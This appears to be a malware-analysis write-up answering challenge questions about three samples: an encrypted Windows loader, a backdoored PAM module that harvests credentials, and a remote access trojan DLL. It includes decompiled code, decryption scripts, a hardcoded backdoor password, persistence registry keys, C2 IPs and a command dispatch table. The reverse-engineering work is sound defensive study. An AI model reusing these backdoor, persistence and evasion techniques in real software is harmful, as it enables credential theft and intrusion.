00000030: 5b b0 00 00 b6 b0 00 55 50 dd 61 70 80 d9 65 77 [......UP.ap..ew
00000040: 81 d6 46 69 5a d5 00 00 01 01 01 01 01 01 01 01 ..FiZ...........
Note that 0x401710 contains the encrypted data, preceded by its length. The routine at sub_401180 accesses this four-byte length field.
“What is the name of the first Windows API function decrypted”
Before we can continue, let us decrypt the remainder of the executable. We could of course run the binary in a debugger and break after decryption, but where’s the fun in that? Instead, we reimplement the decryption routine.
def copy_chunks(addr, size):
offset = 0
data_read = 0
while data_read < size:
chunk = min(0x44, size - data_read)
yield bv.read(addr + offset, chunk)
offset += chunk + 0x1F
data_read += chunk
def decrypt(buffer):
output = bytes()
key = 0xB0B6
for i, chunk in [(i, buffer[i : i + 4]) for i in range(0, len(buffer), 4)]:
c = int.from_bytes(chunk, byteorder="little")
p = (c + i) ^ (key + i)
output += int.to_bytes(p & 0xFFFFFFFF, length=4, byteorder="little")
return output
shellcode_struct = 0x401710
size = int.from_bytes(bv.read(shellcode_struct, 4), byteorder="little")
ciphertext = b"".join(copy_chunks(shellcode_struct + 4, size))
plaintext_addr = 0x900000
bv.memory_map.add_memory_region("decrypted", plaintext_addr, decrypt(ciphertext))
bv.write(plaintext_addr, decrypt(ciphertext))
The very first string that is decrypted is GetProcAddress.
I spend some time adding the decrypted code in a new segment within the same Binary Ninja database, eventually figuring out that the correct API to call is bv.memory_map.add_memory_region. I’m not sure there’s a tangible benefit, but it keeps everything in one place.
“What is the address of the ret instruction responsible for jumping to decrypted shellcode?”
At the end of _start, we see a an offset into the decrypted buffer being loaded into memory (0x86ed0). Tracing the code a bit into sub_401130, we observe the offset being loaded into ecx and then jumped to via the push-and-return we’ve been seeing a lot of so far. It would appear this is the entrypoint into the decrypted code.
The return that is responsible for the jump into the shellcode happens at 0x401167.
We note that before jumping to the shell code, the image base address and a flag value are pushed to the stack. The flag appears to relate to the relative position of _start within the image (see 0x00401622 to 0040163c).
“Based on the memory allocated by the malware, what is the offset of the first instruction executed after decryption? in hex”
We went into this for question 6; the entrypoint is at 0x86ed0. We quickly end up in sub_86670, which is responsible for resolving API functions. It takes the list of functions at the start of the shellcode and passes them to GetProcAddress. The result is an array of references to these API functions.
“What is the second API called by the malware after decryption?”
Let’s have a look at the entrypoint, and define some code.
At sub_868d0, we see a memset routine. The resulting buffer is then passed to sub_86670, where it is populated with references to a bunch of API functions. This is done by first locating a DLL that starts with KER (presumably kernel32.dll) in the Import Address Table, finding GetProcAddress, and then using that to load LoadLibraryExA, loading kernel32.dll again. This second reference to kernel32 is then used to obtain references to 14 API functions using GetProcAddress.
The function this question was looking for was LoadLibraryExA, though.
It would be nice to create a type structure that exposes these API functions somehow.
“The malware decrypts another part in memory with another dynamic key, what is the fixed addition value to the key in hex (word size)?”
This is what’s happening at sub_86e80. The decryption is similar as before, just with a different key.
00986e9c for (int32_t i = 0; i u< size; i += 4)
00986eaf *(arg1 + i) += i
00986ec8 *(arg1 + i) ^= i + 0x3e9
The constant we’re looking for is 0x03e9 (note the leading zero). Just before the decryption call we see a function that serves as memcpy, copying 0x86470 bytes from offset 0x9000f4 (i.e., 0xf4 bytes into the original buffer).
After decrypting, we obtain a complete PE file. Now is perhaps a good time to dump it to a file and start a new Binary Ninja database. Presumably the function at sub_86c70 populates the imports using the resolved addresses in sub_86670.
“There are 3 hardcoded IPs, list them in the format: IP1,IP2,IP3 (same order as found)”
We’re looking for IP addresses; presumably IPv4. The Binary Refinery tool ‘xtp’ allows us to quickly extract IOCs of fixed formats, and IP addresses are easily recognizable.
Running xtp gives us:
212.117.176.187
79.133.196.94
69.57.173.222
94.75.201.1
209.85.143.99
102.54.94.97
38.25.63.10
127.0.0.1
173.194.37.104
8.8.8.8
1.0.0.0
6.0.0.0
While not all of those may be IP addreses, at least we can now search for them in the binary and look at their context. The first three show up at 0x00410954. There’s no immediate cross-reference to 212.117.176.187, but the next two are referenced from sub_40a839, which is indeed called from _start.
Going through the remainder of the list, the IP addresses are part of larger blobs of text. Presumably the hardcoded IP addresses were the first three we found.
“What is the address of the function that perform anti analysis checks”
The string IsDebuggerPresent occurs, but I do not immediately find cross-references. Instead, scrolling down from the top of _start and checking for conditionals, we identify a check for the result of sub_401b98.
Inside, we quickly spot a number of checks that appear to relate to anti-analysis. The loops at and 0x401ca5 checks for a list of processes (listed at 0040cdc8 and 0x40d608), including tools like Wireshark, Regshot, Ollydbg and VirtualBox Guest Additions.
“The malware will use completely different 3 IPs than the hardcoded ones, list them in order: 7x.xxx.xx.xxx,2xx.xx.xx.xx,1xx.xxx.xx.xxx”
We find the hardcoded IP addresses in sub_40a839. They appear to be default values when the globals data_425470 and data_425578 are not populated, though. Setting a breakpoint on 0x0040a899 would surely reveal the IP addresses.
I fear we cannot possibly justify static analysis for this question, especially considering how clear it is when and where we would need to inspect the memory.
We’ll have to skip over the anti-analysis function at sub_401b98 discussed in the previous question, though. We set a breakpoint at 0x00402295, where it is called, and modify the instruction pointer and return value to follow the subsequent conditional jump.
At 0x425470 we find 217.23.12.63 and at 0x425578 we find 109.236.87.106. Scrolling up a bit through memory, we find 79.142.66.239 at 0x425250. All three globals are populated in sub_407805, which initializes several other globals.
“To which Windows environment variable–based folder does the malware copy itself?”
The malware references the CopyFileA and CopyFileW APIs, so we can have a look at the instances where these are called.
At 0x00405d40 we see a reference to CopyFileA that is preceded by a call to GetModuleFileNameA. The first argument to GetModuleFileNameA is hModule = 0, which implies the file name of the current executable is retrieved. This filename is then used as lpExistingFileName. The lpNewFileName is the result of a call to ExpandEnvironmentStringsA, which resolves %appdata%\ScanDisc.exe. Thus the directory we’re looking for is %appdata%.
“What is the registry key the malware uses for persistence?”
We apply a similar strategy, this time searching for RegCreateKey calls. We identify both RegCreateKeyExA and RegCreateKeyExW.
At 0x004039cd, we see a call to RegCreateKeyExW that is preceded by a call to CopyFileW and a path resolution involving %s\%s.exe and %APPDATA%. Surely this is what we’re looking for. Indeed, the involved registry subkey is SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, which can be used for persistence.
The hive key is 0x80000001, which corresponds to HKEY_CURRENT_USER. Thus the full registry path is HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce.
“What is the argument the malware will launch itself with?”
The argument is added immediately after the call to RegCreateKeyExW, using RegSetValueExW. It’s retrieved from data_4140b4: opt.
Silent Authenticator is a backdoor. The description suggests it is a modified PAM module. Indeed, the file output tells us it’s a Shared Object file, and the entrypoint is an empty placeholder.
We do see a couple of exported functions;
pam_sm_acct_mgmt
pam_sm_setcred
pam_sm_authenticate
pam_sm_chauthtok
pam_sm_close_session
pam_sm_open_session
Let’s see where the questions direct us.
“The malware hides sensitive strings using encryption. By analyzing the decryption function, what is the single-byte XOR key stored at offset 0x00 in each encrypted string table entry?”
Clicking through the exported functions, the calls to sub_4032a0 in pam_sm_authenticate immediately stand out. Its input arguments are an integer and an uninitiazed stack array, and inside we see a loop that performs an XOR operation. This is a prime candidate for string decryption.
The question suggests we’re looking at a string table. Indeed, the data at 0060c040 is structured in 16-byte chunks that look as follows:
54 00 XX 00 00 00 00 00
AB CD EF GH IJ KL MN OP
The data at byte 9 to 16 appears to be a pointer to the actual encrypted string; the third byte corresponds to its length. We can create a struct type for readability.
After a bit of clean-up, the function looks as follows:
004032a0 void r_string_decryption(int16_t n, char* str)
004032b1 int16_t len = table[zx.q(n)].len
004032b1
004032b8 if (len != 0)
004032ba int32_t i = 0
004032ba
004032dc do
004032c4 uint64_t idx = zx.q(i.w)
004032c9 char key = i.b ^ table[zx.q(n)].header
004032cb i += 1
004032d2 str[idx] = key ^ table[zx.q(n)].enc_data[idx]
004032d5 len = table[zx.q(n)].len
004032dc while (len u> i.w)
004032dc
004032e1 str[zx.q(len)] = 0
The XOR key stored at offset 0x00 is 0x54.
We can reimplement the decryption in a few lines of Python:
def decrypt_entry(addr):
key = int.from_bytes(bv.read(addr, 1), byteorder="little")
length = int.from_bytes(bv.read(addr + 2, 1), byteorder="little")
c_addr = int.from_bytes(bv.read(addr + 8, 8), byteorder="little")
plain = bytes([c ^ i ^ key for i, c in enumerate(bv.read(c_addr, length))])
bv.write(c_addr, plain)
Although as of yet without any context, the resulting strings are:
97@I7OEaF*5a92
/var/spool/.network/
/usr/bin/.dbus.log
/usr/bin/id
touch -r /usr/bin/id /usr/bin/.db
nohup
>/dev/null 2>
“The decryption function calculates the table entry offset by shifting the index. What is the shift value used in the ‘shl’ instruction to multiply the index by the entry size?”
We see a single shl instruction, which shifts the data by 4 bits.
“Each encrypted string entry contains a pointer to the actual encrypted data. At what byte offset within the 16-byte entry structure is this pointer located?”
See Question 1; that’s the ninth byte, at offset 8.
“The string length field is stored as a 16-bit value within each entry. At what byte offset is the length field located in the entry structure?”
See Question 1; that’s the third byte, at offset 2.
“Analyzing the encrypted strings table, how many total encrypted string entries does the malware store?”
We simply count the entries: there’s seven.
“The first encrypted byte of the backdook password. What is this encrypted byte value?”
It appears there’s a textual error in this question. Still, the password appears to be the first string. Indeed, when we trace its usage we end up at a strcmp call that compares it to the password provided by the user.
We assume the question means to ask for the first byte of the encrypted password string. That’s 0x6d.
“what is the hardcoded master password that bypasses authentication for any user?”
See Question 1 and 6: 97@I7OEaF*5a92.
“What libc function does the malware call to compare the user-supplied password against the decrypted backdoor password?”
See Question 6.
“Before checking the backdoor password, the malware retrieves the username using a PAM API function. What is the name of this function?”
That’s the first API call right after string decryption: pam_get_user.
“After decrypting string index 2, what is the full file path where the malware stores harvested credentials?”
String index 2 is /usr/bin/.dbus.log. Indeed, when we follow its usage throughout the function we see that it is being used as the input to fputs to read and store a 512-byte buffer.
“Before writing credentials, the malware encodes them as hexadecimal. What sprintf format specifier is used for this hex encoding?”
That’s just a bit above the code that writes out the buffer; %2X
“The credential log uses a specific format string for entries. What is the prefix text that appears before the encoded username in each log entry?”
The credentials are stored using the format string error ServiceUnknown->%s : %s\n.
“What separator string appears between the encoded username and encoded password in the log format?”
See Question 12: that’s a colon.
“When opening the credential log for writing new entries, what fopen mode string is used?”
We’re appending, using a.
“After decrypting string index 3, what is the full path to the legitimate file used as a timestamp reference?”
I don’t immediately see where it is used in relation to timestamps, but the string at index 3 is /usr/bin/id.
“After decrypting string index 4, what Unix command is used to copy the timestamp from the reference file? (First word only)”
The string at index 4 starts with the touch -r command to read the timestamp of /usr/bin/id.
“The timestamp manipulation command uses what flag to reference another file’s timestamp?”
See Question 16.
“what is the full path to the hidden directory where the malware looks for scripts to execute?”
That’s /var/spool/.network/. The directory is opened at 00403603 and its content is executed using the system call at 004036c3.
“What libc function is called to open the hidden directory for reading its contents?”
Right, that’s opendir. See Question 18.
“What libc function is called in a loop to iterate through each file in the hidden directory?”
That must be readdir.
“The malware checks the d_type field to identify regular files. What decimal value indicates a regular file (DT_REG)?”
The result of readdir is a dirent structure, which Binary Ninja conveniently parses for us. Its ->d_type is compared to 8.
“After decrypting string index 5, what Unix utility is prepended to commands to run them detached from the terminal?”
That describes nohup.
“After decrypting string index 6, what is the full output redirection string appended to executed commands?”
That’s the >/dev/null 2>&1 & string. It redirects stderr to stdout, and both of them to /dev/null.
“What libc function is used to execute the constructed command string containing nohup and the script path?”
See Question 18; that’s system.
“Before logging credentials, the malware checks if it has root privileges. What libc function returns the effective user ID?”
That’s geteuid().
“What return value from geteuid indicates the process is running as root?”
The return value 0.
“What libc function is called to check if the credential log file already exists before writing?”
That’s access.
“What is the name of the main PAM export function that contains all the backdoor logic?”
That’s the function we’ve been analyzing all along: pam_sm_authenticate
“How many PAM module functions (pam_sm_) are exported by this malicious module?”*
There’s six, which we easily identify by filtering the symbol table for exported symbols.
pam_sm_acct_mgmt
pam_sm_setcred
pam_sm_authenticate
pam_sm_chauthtok
pam_sm_close_session
pam_sm_open_session
“What string identifier is passed to pam_set_data to store the authentication return value?”
That happens at several error handling branches, the first one immediately when pam_get_user fails. It’s unix_setcred_return.
“What PAM internal data identifier string is used when prompting for and storing the user’s password?”
That’s the identifier passed to a function we identify as unix_read_password, at 00403568.
“When authentication fails, pam_fail_delay is called. What is the delay value in microseconds passed to this function?”
Looking for cross-references to pam_fail_delay, we identify a single call where the value 0x1e8480 is passed. That’s 2000000 in decimal.
“What is the size in bytes of the stack buffer used to construct command strings before execution? (Decimal)”
That’s the buffer passed to the system call: its length is 0x200, or 512 in decimal.
“When reading lines from the credential log, what is the maximum line length passed to fgets?”
That’s also a buffer of 0x200 bytes.
“When updating an existing credential log entry, the malware uses a temporary file. What single-character filename is used for this temporary file?”
The file is called a; it gets renamed to /usr/bin/.dbus.log at 00403a82.
While we’re on the subject of backdoors, let’s have a look at AuRAT. I promise that that’s the reason, and not at all because I sorted on challenges that target static analysis. So far all the challenges were labeled ‘Easy’ or ‘Medium’; AuRAT is labeled ‘Hard’. I suppose there is only one way to find out what that means.
AuRAT is a DLL file that, according to the challenge description, hosts a remote access trojan and exfiltrates sensitive data.
We’re off to a good start, because when opening the file in Binary Ninja it is not recognized as a PE file; the file header is destroyed.
00000000 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 |................|
00000010 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 |......@.........|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f |................|
00000040 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 |......!..L.!This|
00000050 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 | program cannot |
00000060 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f |be run in DOS mo|
00000070 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd 4b |de....$........K|
If we compare it to the PE header of a different file, we immediately notice that the first two bytes appear to have been dropped.
00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 |MZ..............|
00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 |........@.......|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 |................|
00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 |........!..L.!Th|
00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f |is program canno|
00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 |t be run in DOS |
00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |mode....$.......|
We improve the file by simply prefixing the MZ bytes, but we’re not there yet.
| 00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 | MZ………….. |
| 00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 | ……..@……. |
| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ……………. |
| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 | ……………. |
| 00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 | ……..!..L.!Th |
| 00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f | is program canno |
| 00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 | t be run in DOS |
| 00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 | mode….$……. |
| 00000080 fd 4b cf a9 b9 2a a1 fa b9 2a a1 fa b9 2a a1 fa | .K………*.. |
| 00000090 e2 42 a5 fb b3 2a a1 fa e2 42 a2 fb bc 2a a1 fa | .B……B….. |
| 000000a0 e2 42 a4 fb 3d 2a a1 fa b2 45 a4 fb a7 2a a1 fa | .B..=…E….. |
| 000000b0 b2 45 a5 fb b7 2a a1 fa b2 45 a2 fb b1 2a a1 fa | .E……E….. |
| 000000c0 e2 42 a0 fb ba 2a a1 fa b9 2a a0 fa ed 2a a1 fa | .B………*.. |
| 000000d0 7d 45 a8 fb bf 2a a1 fa 7d 45 a2 fb bb 2a a1 fa | }E…..}E….. |
| 000000e0 7d 45 a3 fb b8 2a a1 fa 52 69 63 68 b9 2a a1 fa | }E…..Rich... |
| 000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ……………. |
| 00000100 00 00 00 00 00 00 00 00 00 00 64 86 06 00 f3 76 | ……….d….v |
| 00000110 b9 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 | .`……….” .. |
| 00000120 0e 19 00 0a 01 00 00 d0 00 00 00 00 00 00 88 46 | ……………F |
| 00000130 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 | ……………. |
| 00000140 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 | ……………. |
| 00000150 00 00 00 00 00 00 00 20 02 00 00 04 00 00 00 00 | ……. …….. |
| 00000160 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 | ….`……….. |
| 00000170 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 | ……………. |
| 00000180 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 | ……………. |
| 00000190 00 00 00 00 00 00 34 ae 01 00 28 00 00 00 00 00 | ……4…(….. |
| 000001a0 00 00 00 00 00 00 00 e0 01 00 58 11 00 00 00 00 | ……….X….. |
| 000001b0 00 00 00 00 00 00 00 10 02 00 4c 06 00 00 e4 96 | ……….L….. |
| 000001c0 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 | ……………. |
| 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 | ……………. |
We also make note of the pointer to the PE header (at offset 0x3C). At 0x3C we see 0x0108; that makes sense, since we’re seeing a Rich Header in between. Around 0x0108 is where we’re starting to see some data: 00 00 64 86 06 00 f3 76 b9 60. The 64 86 bytes are a good sign, as they indicate an x86-64 binary.
Let’s insert the magic bytes. Note that the PE signature is a 4-byte header: 50 45 00 00. The 00 00 remains, but the PE was stripped.
Now we’re getting somewhere!
$ file aurat/challenge
aurat/challenge: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
And indeed, Binary Ninja is now able to fully parse the DLL.
We start off at the DLL entrypoint, and identify the first non-library function at 180003fc0.
180003fc0 int64_t r_main(int64_t arg1, int32_t arg2)
180003fc7 if (arg2 == 1)
180003fdf sub_180001000(0x1acb4b50)("DLL_PROCESS_ATTACH")
18000401b sub_180001000(0x26662fcc)(0, 0, sub_180003f60, &data_18001c9f0, 0, 0)
18000401b
18000402b return 1
There appears to be some obfuscation going on; the call to sub_180001000 receives a 64-bit constant and returns a function pointer. If we click into sub_180003f60, we see more calls to sub_180001000.
Inside sub_180001000 we see a familiar structure: zx.q(*(zx.q(*(result + 0x3c)) + result + 0x88)) + result. The 0x3C navigates to the PE Header, and 0x88 is the offset for the Export Address Table. We give it the type IMAGE_EXPORT_DIRECTORY* and the rest of the API hashing becomes clear:
180001000 void* sub_180001000(enum hashdb_strings_mult21_add arg1)
180001008 void* DLL_base = get_dll_base()
180001008
180001013 if (DLL_base == 0)
18000101a return DLL_base
18000101a
18000101e int32_t i = 0
18000102e IMAGE_EXPORT_DIRECTORY* eat =
18000102e zx.q(*(zx.q(*(DLL_base + 0x3c)) + DLL_base + 0x88)) + DLL_base
180001035 uint32_t num_exports = eat->NumberOfNames
180001039 char** names = zx.q(eat->AddressOfNames) + DLL_base
180001039
18000103f if (num_exports != 0)
180001071 do
180001044 int32_t hash = 0
180001046 char* name = zx.q(*names) + DLL_base
180001046
18000104e for (char c = *name; c != 0; c = *name)
180001053 name = &name[1]
18000105a hash = hash * 0x21 + sx.d(c)
18000105a
180001065 if (hash == arg1)
1800010a3 return zx.q(*(zx.q(eat->AddressOfFunctions) + DLL_base + (zx.q(
1800010a3 *(zx.q(eat->AddressOfNameOrdinals) + DLL_base + (sx.q(i) << 1)))
1800010a3 << 2))) + DLL_base
1800010a3
180001067 names += 4
18000106b i += 1
180001071 while (i u< num_exports)
180001071
18000107f return 0
Looking up the hash in HashDB (using the Binary Ninja plugin) tells us the same thing: it’s mult21_add. By resolving a hash using this plugin, a structure is created called hashdb_strings_mult21_add. We apply this type to the argument of r_resolve_API to greatly improve readability of every API hashing call;
The DLLMain function now becomes:
180003fc0 int64_t r_main(int64_t arg1, int32_t arg2)
180003fc7 if (arg2 == 1)
180003fdf sub_180001000(OutputDebugStringA)("DLL_PROCESS_ATTACH")
18000401b sub_180001000(CreateThread)(0, 0, sub_180003f60, &data_18001c9f0, 0, 0)
18000401b
18000402b return 1
Much better!
Scrolling through the functions following sub_180001000, we note that there are several that look similar but do slightly different things. Consider, e.g., sub_1800012d0 that performs an API lookup in msvcrt, and 180001160 that specifically looks for wsprintfA in user32.dll. Using HashDB we quickly resolve these as well, and add them to our enum.
In sub_180003f60 we see two functions. While it is tempting to dive into sub_180002110 and rebuild the structure, it appears the interesting code happens in sub_180002460. Still it is useful to at least create the structure that sub_180002110 initializes, so that we can quickly cross-reference interesting fields later.
Remark that the blob of data at data_18001c9f0 is passed along into sub_180002460. It appears to be accessed through fields as well, so we also convert this to a struct.
We can now work our way through the functions that are being called, some of which are more interesting than others. sub_180003930 tests whether the binary is running as SYSTEM, and whether it is called svchost.exe. sub_180003720 sets up a TCP connection to a host that’s hardcoded in the data that is passed to the thread (interesting!). And sub_180003290 constructs a packet of data!
“What is the magic value that must start every C2 packet (0x00000000)?”
Inside sub_180003290 we see cryptographic operations, a call to sub_180001cf0 and then a call to w2_32’s send API. Diving into sub_180001cf0 we immediately see the magic constant that is copied into the packet buffer: 0x37f457d1.
We note that directly following the magic header is a timestamp (i.e., the output of QueryPerformanceCounter) and the constant that is passed to the function (2; perhaps an opcode).
“What command ID (0x??) makes the malware sleep or exit?”
Following along in the main thread code, we make note of a call to recv at address 180002705. After this call, we’ll expect command parsing logic.
At 180002b3c we see a call to closesocket and Sleep. This must be the command we’re looking for. Following the branches upwards, we can see that this branch is the else-case for the check whether the command ID is not 3, so this command corresponds to ID 0x03.
“What command ID (0x??) triggers system information exfiltration?”
That appears to be command 0x05, which executes sub_180003ae0. It reads the contents of \\SYSTEM\svchost.exe, and sends it off together with a buffer stored in the thread structure.
I’m not sure if I would call that ‘system information exfiltration’, but it’s as close as it gets.
“What command ID (0x??) terminates the malware immediately?”
The main loop runs until a flag in the data struct is set to 1; each iteration of the loop hits a check at 1800026b2 that verifies whether this flag is still zero.
The code at 180002b46, when the opcode is 0x0E, does not really do anything besides set this flag to 1. This breaks the loop and triggers the termination code.
“What command ID (0x??) loads a new module into memory?”
This happens for command ID 0x08. At 1800029c5 the memory block is marked as executable, and at 1800029de the newly loaded code is executed.
“What packet type is sent for authentication (answer: int)?”
After starting and establishing a TCP connection, the function at sub_180003290 sends the first C2 packet. The packet header contains the type: 2.
“What encryption algorithm protects C2 communication?”
As discussed in Question 1, Tte function at sub_180001cf0 is responsible for building the packet. After constructing the packet, sub_180001b10 is used to encrypt its contents.
The crucial call is CryptImportKey, which sets up the key context. Its second argument is an array specifying the key type. After fixing the data types, we find the following:
180001ba2 pbdata.blobheader.aiKeyAlg = CALG_AES_128
180001ba9 pbdata.blobheader.bType = PLAINTEXTKEYBLOB
180001ba9 pbdata.blobheader.bVersion = CUR_BLOB_VERSION
180001ba9 pbdata.blobheader.reserved = 0
180001bb0 pbdata.aes_sid = ALG_SID_AES_256
The algorithm name we’re looking for is AES.
“How many bytes is the encryption key (answer= int)?”
The key is copied directly after the key structure is initialized, at 180001bc9. It’s a 16-byte key. The Algorithm ID (CALG_AES_128) also gave that away.
“How many bytes of configuration are hashed for auth (answer = int)?”
We backtrack to sub_180003290 where the authentication packet is set up. It contains a call to CryptHashData, where 0x278 bytes of data are hashed. That’s 632 in decimal.
“What crypto provider type is used for algorithm (answer = int)?”
That’s a bit of a vaguely worded question, and it is not immediately clear which crypto provider is being referred to. There are two instances; one for the MD5 hash, and one for the AES encryption. They can be found by looking at CryptAcquireContextA calls.
The fourth argument specifies the dwProvType. In the case of MD5 the code uses PROV_RSA_FULL (type 0x1), and in the case of AES the code uses PROV_RSA_AES (type 0x18). The latter turns out to be the required answer, which is 24 in decimal.
“What size is added to encrypted packet allocation (answer = int)?”
The allocation at 180001d94 is crucial here: 0x74 bytes are allocated in addition to the data length passed into sub_180001cf0. That’s 116 in decimal.
“What is the sleep duration between failed C2 connections (ms)?”
We cannot directly search for the Sleep symbol, but we can search for the hash. Using the HashDB enum, we see that the API hash for Sleep is 0x61ae5d9. Searching the disassembly leads us to a couple mov instructions that set up the API resolution for Sleep. All instances show a 120000ms delay.
“How many bytes are checked for packet magic?”
The packet header is checked at 180002725. It’s a 4-byte header, and all four bytes are compared using cmp dword [rax], 0x37f457d1
For some reason the Malops system does not accept 4, though, and I ended up brute-forcing my way to the answer 16. I believe that’s incorrect, and I’ve mentioned it to the challenge author in the Discord channel.
“What file does malware read for process hollowing?”
At 1800024a8, at the start of the main thread, the malware checks whether it is running as svchost.exe, presumably the resulting of process hollowing. That means that the injection must have already taken place before this point. There is not really much code before this point other than the thread struct initialization, though.. Perhaps the assumption here is that some parent process has injected this sample.
The command ID 0x05 does lead to subprocess injection into svchost.exe via sub_180003ae0, but to get there, we would already need to be running as svchost.exe.
“What hash value is compared to find RtlAllocateHeap (0x00000000)?”
We can consult our API enum: that’s 0x278e4f75.
Note that this question used to ask for the hash for HeapAlloc instead of RtlAllocateHeap. This has since been fixed.
“What file name is appended to Windows directory?”
In thread structure initialization, we spot the path \\Temp\auk.exe at 180002242. So the answer is auk.exe here.
“What buffer size is used for hostname?”
In the thread structure initialization at 18000234d we see a buffer of length 0x100 (256 bytes) that’s being passed to gethostname.
“What protection flag is set for shellcode execution ?”
Command ID 6 and 7 seem to relate to executing loaded code. It is stored in a buffer that is marked as PAGE_EXECUTE_READWRITE using a call to VirtualProtect. The corresponding constant is 0x40. Against all conventions, the question expects the answer in decimal: 64.
“What debug string indicates receive failure?”
At address 180002d3f, we see the string Recv failed. Note that there are two spaces separating the words.
“How many times is socket created on connection failure?”
The TCP connection is established in sub_180003720. We make note of three calls to ws2_32.socket. This corresponds to the three hardcoded IP addresses that are attempted.
“What mutex prevents multiple instances?”
That’s the mutex created at 1800024d7, called V4.0.
“What Win32 error type name indicates mutex exists (string)?”
That’s error code 0xb7, which corresponds to ERROR_ALREADY_EXISTS in the WIN32_ERROR enumeration type.
“what is the address of the function convert hostname to IP (0x00000000)?”
It’s referenced from sub_180003720, which tries to set up a TCP connection: sub_1800035f0 converts a hostname to an IP address.
“How many commands are handled in malware command dispatch?”
The branches are sometimes negated (e.g., checking whether the command ID is unequal to 0x05) so it’s a bit finnicky. Let’s create a brief table:
| ID | Address | Description |
|---|---|---|
0x03 |
180002b01 |
Sleep. |
0x04 |
180002b46 |
Related to shellcode. |
0x05 |
180002882 |
Send data and content of svchost.exe? |
0x06 |
18000288f |
Related to executing shellcode. |
0x07 |
18000288f |
Related to executing shellcode. |
0x08 |
1800028ed |
Related to plugin functions. |
0x09 |
180002937 |
Related to cleaning up plugins. |
0x0A |
1800027bf |
Send a packet of type 0x08 containing a flag value. |
0x0B |
180002b46 |
Related to WTSEnumerateSessionsA. |
0x0C |
180002c3a |
Unclear; relates to testing if user is admin. |
0x0D |
180002b9b |
Create /Temp/auk.exe |
0x0E |
180002b46 |
Terminate the program. |
That’s 12 cases. The challenge website accepts 15 as the correct answer, though. That’s odd, since there are no cases that handle command ID 0x00, 0x01 and 0x02; those command IDs fail the test at 180002c2c and trigger a jump back to the start of the loop.
“What is the hash multiplier constant used in malware hash algorithm?”
As discussed above, the algorithm is mult21_add. That’s 0x21 though, so 33 in decimal.
“What is the total configuration buffer size (bytes) on the function that setup the configuration of the malware?”
The ‘function that sets up the configuration’ must refer to sub_180002110. It allocates four buffers, of length 0x80000, 0x104, 0x104 and 0x278. In addition, the overarching structure allocated outside of the function is 0x98 bytes in size.
I’ll admit I tried a variety of combinations of those. After mentioning my confusing on the Discord channel, I was told to try 0x278 (632 decimal). I suppose that makes sense; that buffer holds the computer name, username, IP address and malware version (V1.1). It’s also the buffer that is transmitted as part of the initial packet sent in sub_180003290.
“What is the socket protocol (integer) used for TCP connections?”
All socket calls take the arguments socket(2, 1, 6). The third argument is the protocol type: 6 is IPPROTO_TCP.